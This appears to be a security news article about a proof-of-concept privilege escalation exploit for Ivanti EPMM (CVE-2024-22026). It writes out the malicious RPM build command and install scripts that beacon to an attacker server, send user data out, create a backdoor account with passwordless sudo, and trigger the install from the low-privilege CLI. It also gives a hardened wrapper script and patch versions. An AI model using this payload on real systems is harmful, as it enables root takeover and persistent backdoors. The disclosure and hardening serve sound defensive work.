PoC Exploit Released for Ivanti EPMM MobileIron Core
A newly disclosed vulnerability, CVE-2024-22026, has been found in Ivanti Endpoint Manager Mobile (EPMM), formerly MobileIron Core.
The vulnerability allows a local attacker to gain root access on affected systems.
The severity of this vulnerability is at present undetermined.
CVE-2024-22026: Local Privilege Escalation Vulnerability
The attack vector for CVE-2024-22026 is local, which means the attacker must already have local access to the system (for example a low-privilege CLI account) in order to exploit it, according to reports on GitHub.
Once exploited, the attacker gains root access, which provides full control over the system and could lead to major security breaches.
Discovery
The appliance exposes the following command to a low-privilege CLI user for downloading and installing RPM packages:
install rpm url
This command is a CLI wrapper around the following, which is executed as root:
/bin/rpm -Uvh *.rpm
Because the wrapper hands the package to rpm without verifying its signature and without restricting which URLs may be fetched, any RPM can be installed this way. An attacker can build an arbitrary package, host it on a server they control, and have the appliance download and install it as root, which also runs whatever pre- and post-install scriptlets the package carries.
Exploitation PoC
Creating the Malicious RPM
The following command is used to build the malicious RPM package (the pre- and post-install scripts are shown below):
fpm -s dir -t rpm -n ivanti-privesc -v 13.37 -a i386 --description "Ivanti POC" --maintainer "exploit-poc" --before-install preinstall.sh --after-install postinstall.sh -C .
Preinstall Script (preinstall.sh)
#!/bin/sh
# Beacon to the attacker's server (host omitted in the published PoC)
curl -O http:///poc
exit 0
Postinstall Script (postinstall.sh)
#!/bin/sh
set -e  # Enable strict error checking
# Report back current user and privilege level (expected: root / uid 0)
CURRENT_USER=$(whoami | base64)
PRIV_LEVEL=$(id -u | base64)
curl http:///poc?user=$CURRENT_USER
curl http:///poc?priv=$PRIV_LEVEL
# Create a new root user
if ! useradd -s /bin/sh -m exploit-poc; then
    echo "Failed to add user 'exploit-poc'" >&2
    exit 1
fi
# Set the backdoor account's password (value after the colon not given in the published PoC)
echo "exploit-poc:" | chpasswd
# Grant root privileges
if ! echo "exploit-poc ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers; then
    echo "Failed to modify sudoers file" >&2
    exit 1
fi
exit 0
Running the CLI Command to Fetch the RPM
To exploit the flaw, the attacker runs the command below from the low-privilege CLI; the appliance downloads the malicious RPM and installs it as root, executing the scripts above:
install rpm url http:///ivanti-privesc-13.37-1.i386.rpm
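The PoC above works because the wrapper neither restricts where the package comes from nor checks that it is signed. The script below is an added example of how such a wrapper could be hardened; it is not Ivanti's code and not from the original article. The host allowlist, the assumption that the vendor signing key has already been imported with rpm --import, and the rpm 4.14+ output format of rpm -K are all assumptions made for the example. An unsigned package such as the fpm-built one in the PoC prints only "digests OK" under rpm -K and is rejected.

```shell
#!/bin/sh
# Hardened replacement for an "install rpm <url>" wrapper (added example,
# not Ivanti's code). It refuses the two things the page says the real
# wrapper does not check: where the package comes from and whether it is
# signed by a trusted key.
#
# Assumptions (not taken from the page):
#   - ALLOWED_HOSTS lists the only hosts packages may be fetched from
#   - the vendor's signing key is already imported (rpm --import)
#   - rpm 4.14+ output format for `rpm -K`:
#       "pkg.rpm: digests signatures OK"      signed by a trusted key
#       "pkg.rpm: digests OK"                 unsigned (digests only)
#       "pkg.rpm: digests SIGNATURES NOT OK"  bad or untrusted signature

ALLOWED_HOSTS="updates.example.com mirror.example.com"   # assumed allowlist

# url_allowed URL: succeed only for https:// URLs whose host is allowlisted.
# The host is compared exactly, so "updates.example.com.evil.net" and
# "updates.example.com@evil.net" (userinfo trick) are both rejected.
url_allowed() {
    url=$1
    case "$url" in
        https://*) ;;
        *) return 1 ;;       # plain http, file://, ftp:// etc. are all refused
    esac
    host=${url#https://}
    host=${host%%/*}         # drop path
    host=${host%%:*}         # drop port
    [ -n "$host" ] || return 1
    for allowed in $ALLOWED_HOSTS; do
        [ "$allowed" = "$host" ] && return 0
    done
    return 1
}

# sig_output_ok OUTPUT: succeed only if `rpm -K` reported a verified signature.
# An unsigned package (such as one built with fpm as in the PoC above)
# prints only "digests OK" and is rejected.
sig_output_ok() {
    case "$1" in
        *"NOT OK"*)        return 1 ;;
        *"signatures OK"*) return 0 ;;
        *)                 return 1 ;;
    esac
}

# install_rpm_hardened URL: validate, download, verify, then install one file.
install_rpm_hardened() {
    url=$1
    url_allowed "$url" || { echo "refusing: URL not on allowlist: $url" >&2; return 1; }
    tmp=$(mktemp -d) || return 1
    pkg="$tmp/package.rpm"
    # --proto '=https' also blocks redirects to non-https; --fail makes
    # HTTP errors a non-zero exit; --max-filesize bounds disk use.
    if ! curl --fail --silent --show-error --proto '=https' \
            --max-filesize 104857600 -o "$pkg" "$url"; then
        rm -rf "$tmp"; return 1
    fi
    if ! sig_output_ok "$(rpm -K "$pkg" 2>&1)"; then
        echo "refusing: unsigned or untrusted package" >&2
        rm -rf "$tmp"; return 1
    fi
    # Install exactly the verified file, not a "*.rpm" glob over a directory
    # that anything else might have dropped a package into.
    rpm -Uvh "$pkg"
    rc=$?
    rm -rf "$tmp"
    return $rc
}
```

Checking the rpm -K output string rather than only its exit code matters because rpm -K exits 0 for an unsigned package whose digests match, which is exactly the case the PoC relies on. The allowlist is compared as an exact host string so that look-alike domains and the userinfo trick do not slip through.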
Ivanti has released patches that address this vulnerability in versions 12.1.0.0, 12.0.0.0, and 11.12.0.1.
Users are advised to upgrade to these versions to mitigate the risk associated with CVE-2024-22026.
Source credit : cybersecuritynews.com